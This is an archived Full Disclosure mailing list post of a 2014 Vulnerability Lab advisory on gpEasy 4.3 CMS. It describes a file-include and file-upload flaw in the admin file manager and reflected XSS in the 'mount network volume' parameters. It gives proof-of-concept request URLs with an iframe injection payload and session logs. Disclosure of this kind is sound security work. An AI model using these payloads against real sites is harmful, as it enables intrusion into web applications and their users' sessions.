Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

gpEasy v4.3.x CMS - Multiple Web Vulnerabilities

From: Vulnerability Lab <research () vulnerability-lab com>
Date: Fri, 07 Feb 2014 12:31:27 +0100
Document Title:
===============
gpEasy v4.3.x CMS - Multiple Web Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1189


Release Date:
=============
2014-02-06


Vulnerability Laboratory ID (VL-ID):
====================================
1189


Common Vulnerability Scoring System:
====================================
6.1


Product & Service Introduction:
===============================
gpEasy 4.3 is a complete content management system that lets users create rich and flexible Web sites with a simple and 
easy-to-use interface. 
The embedded design of the admin interface allows users to instantly see changes in a single browser window. gpEasy has 
many qualities, 
but if we had to pick three adjectives to describe our CMS, it would have to be fast, easy and free. These three small 
words represent 
big ideas for us and embody the principles that drive gpEasy development.

(Copy of the Vendor Homepage: http://www.gpeasy.com/Fast_Easy_and_Free )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official gpEasy v4.3 content 
management system.


Vulnerability Disclosure Timeline:
==================================
2013-02-06:    Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
gpEasy
Product: gpEasy Content Management System (Web Application) 4.3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
1.1
A file include and arbitrary file upload web vulnerability has been discovered in the official gpEasy v4.3 content 
management system.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or 
system specific 
path commands to compromise the web-application. The arbitrary file upload issue allows remote attackers to upload 
files with multiple 
extensions to bypass the web-server or system validation.

The vulnerability is located in the `file- and folder` name values of the `upload files` module. Attackers can tamper 
the POST method 
request to upload own malicious script codes or web shells. The validation does also not support filter mechanism for 
multiple file extension 
which can result in a prepared combined attack to include a file and upload/execute arbitrary codes. The security risk 
of the local and remote vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 
6.1(-).

Exploitation of the local file include and arbitrary file upload web vulnerability requires no user interaction but a 
privileged web-application 
user account. Successful exploitation of the local web vulnerability results in application or dbms compromise by 
combined lfi/afu web attacks.

Request Method(s):
                                [+] POST

Vulnerable Module(s):
                                [+] Home > Administration > Uploaded Files

Vulnerable Parameter(s):
                                [+] file- and folder name

Vulnerable Module(s):
                                [+] Upload File Manager 


1.2
Multiple client-side cross site scripting web vulnerabilities has been discovered in the official gpEasy v4.3 content 
management system.
A non-persistent cross site vulnerability allows remote attackers to manipulate client-side browser requests through 
the affected web-application.

The vulnerability is located in the `mount network volume` function of the `content > upload files` module. The 
vulnerable input field values are 
`host`,`port`,`path`,`user` and `pass`. Remote attackers can manipulate the GET method request of the `mount network 
volume` function to provoke a wrong 
encoded exception which executes the injected script code. The code executes in the invalid error message exception of 
the mount network volume function. 
The security risk of the remote xss web vulnerability is estimated as medium with a cvss (common vulnerability scoring 
system) count of 2.9(+).

Request Method(s):
                                [+] GET

Vulnerable Module(s):
                                [+] Home > Administration > Uploaded Files > Mount Network Volume

Vulnerable Parameter(s):
                                [+] host
                                [+] port
                                [+] path
                                [+] user
                                [+] pass

Affected Module(s):
                                [+] Error invalid Content Exception


Proof of Concept (PoC):
=======================
1.1
The file include and arbitrary file upload web vulnerability can be exploited by local attacker with privileged user 
account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided steps and information below.


PoC:

<div style="height: 746px;" class="finder-cwd-wrapper"><div style="height: 744px;" unselectable="on" 
class="ui-helper-clearfix finder-cwd ui-selectable ui-droppable finder-cwd-view-icons"><div id="tmp_57646" 
class="finder-cwd-file  directory ui-corner-all finder-cwd-file-tmp ui-selectee ui-state-disabled" title="Today 17:0">
<div class="finder-cwd-file-wrapper ui-corner-all"><div class="finder-cwd-icon finder-cwd-icon-directory ui-corner-all" 
unselectable="on"></div></div><div class="finder-cwd-filename" title="untitled folder">>"<[FILE INCLUDE VULNERABILITY 
VIA PATH]</div></div>



--- PoC Session Logs [POST] ---
Status: 200[OK]
GET http://gpeasy.localhost:8622/Admin_Finder?verified=a78309cc12&cmd=mkdir&name=[FILE INCLUE 
VULNERABILITY!+]&target=[#PENG!]l1_Lw&_=1391616013488 Load Flags[LOAD_BACKGROUND  ] Größe des Inhalts[-1] Mime 
Type[text/html]
   Request Header:
      Host[demo-31ca1a14f3ab75.gpeasy.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
      Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-Requested-With[XMLHttpRequest]
      Referer[http://demo-31ca1a14f3ab75.gpeasy.com/Admin_Uploaded]
      Cookie[demo-31ca1a14f3ab75=eab8166b0a152ac27b9c0136a5e45478d1c5dff8a499c6265ec407d655526762b9845a1a; 
gpEasy_53ef13dc235a=4CPb4xGrLOKfN2YR0O8HdxJqnzVUqNrck5PwFKfQ]
      Connection[keep-alive]
   Response Header:
      Date[Wed, 05 Feb 2014 16:00:26 GMT]
      Server[Apache/2.2.24 (Unix)]
      X-Powered-By[PHP/5.3.3]
      Expires[Wed, 5 Feb 2014 16:00:26 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      Content-Encoding[gzip]
      Vary[Accept-Encoding]
      Last-Modified[Wed, 05 Feb 2014 16:00:26 GMT]
      Connection[close]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=utf-8]



1.2
The cross site scripting web vulnerability can be exploited by remote attackers without privileged user account and 
with medium or high user interaction.
For security demonstration or to reproduce the vulnerability follow the provided steps and information below.

Example PoC:
http://gpeasy.localhost:8622/Admin_Finder?verified=a78309cc12&cmd=netmount&protocol=ftp&host=%22[CLIENT-SIDE INJECTED 
SCRIPT CODE!]%3E&port=%22[CLIENT-SIDE INJECTED SCRIPT CODE!]%3E
&path=%22[CLIENT-SIDE INJECTED SCRIPT CODE!]%3E&user=%22[CLIENT-SIDE INJECTED SCRIPT CODE!]%3E&pass=%22[CLIENT-SIDE 
INJECTED SCRIPT CODE!]%3E&_=1391619422697

PoC:
http://gpeasy.localhost:8622/Admin_Finder?verified=a78309cc12&cmd=netmount&protocol=ftp&host=%22%3E%3Ciframe+src%3Da%3E&port=%22%3E%3Ciframe+src%3Da%3E
&path=%2F%22%3E%3Ciframe+src%3Da%3E&user=%22%3E%3Ciframe+src%3Da%3E&pass=%22%3E%3Ciframe+src%3Da%3E&_=1391619422697


PoC: Source Admin_Finder? - Exception 

<html><head></head><body>{"error":["errNetMount","\"><%22[CLIENT-SIDE INJECTED SCRIPT CODE!]%3E">",
"Unable to connect to FTP server \"><%22[CLIENT-SIDE INJECTED SCRIPT 
CODE!]%3E>"],"debug":{"connector":"php","phpver":"5.3.3","time":0.25530505180359,
"memory":"7415Kb \/ 7365Kb \/ 
128M","upload":"","volumes":[{"id":"l1_","name":"localfilesystem","imgLib":"gd"}],"mountErrors":[]}}</iframe></body></html>


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET 
http://gpeasy.localhost:8622/Admin_Finder?verified=a78309cc12&cmd=netmount&protocol=ftp&host=%22%3E%3Ciframe+src%3Da%3E&port=%22%3E%3Ciframe+src%3Da%3E&path=%2F%22%3E%3Ciframe+src%3Da%3E&user=%22%3E%3Ciframe+src%3Da%3E&pass=%22%3E%3Ciframe+src%3Da%3E&_=1391619422697
 Load Flags[LOAD_BACKGROUND  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[demo-31ca1a14f3ab75.gpeasy.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
      Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-Requested-With[XMLHttpRequest]
      Referer[http://demo-31ca1a14f3ab75.gpeasy.com/Admin_Uploaded]
      Cookie[demo-31ca1a14f3ab75=eab8166b0a152ac27b9c0136a5e45478d1c5dff8a499c6265ec407d655526762b9845a1a; 
gpEasy_53ef13dc235a=4CPb4xGrLOKfN2YR0O8HdxJqnzVUqNrck5PwFKfQ]
      Connection[keep-alive]
   Response Header:
      Date[Wed, 05 Feb 2014 16:57:15 GMT]
      Server[Apache/2.2.24 (Unix)]
      X-Powered-By[PHP/5.3.3]
      Expires[Wed, 5 Feb 2014 16:57:15 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      Content-Encoding[gzip]
      Vary[Accept-Encoding]
      Last-Modified[Wed, 05 Feb 2014 16:57:15 GMT]
      Connection[close]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=utf-8]


Solution - Fix & Patch:
=======================
1.1.


1.2
The second vulnerability can be patched by a secure parse of the invalid context exception handling.
Parse and filter the input field GET method request with the vulnerable host, path, pass, user and port parameters.


Security Risk:
==============
1.1
The security risk of the local file include and arbitrary file upload web vulnerability is estimated as high(-).

1.2
The secuirty risk of the client-side cross site scripting web vulnerabilities are estimated as medium(-).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm () evolution-sec com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all 
warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss 
of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such 
damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack 
into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                             - www.evolution-sec.com
Contact:    admin () vulnerability-lab com      - research () vulnerability-lab com            - admin () evolution-sec 
com
Section:    www.vulnerability-lab.com/dev       - forum.vulnerability-db.com                   - 
magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                - 
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability 
Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the 
use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, 
videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, 
list (feed), 
modify, use or edit our material contact (admin () vulnerability-lab com or research () vulnerability-lab com) to get a 
permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: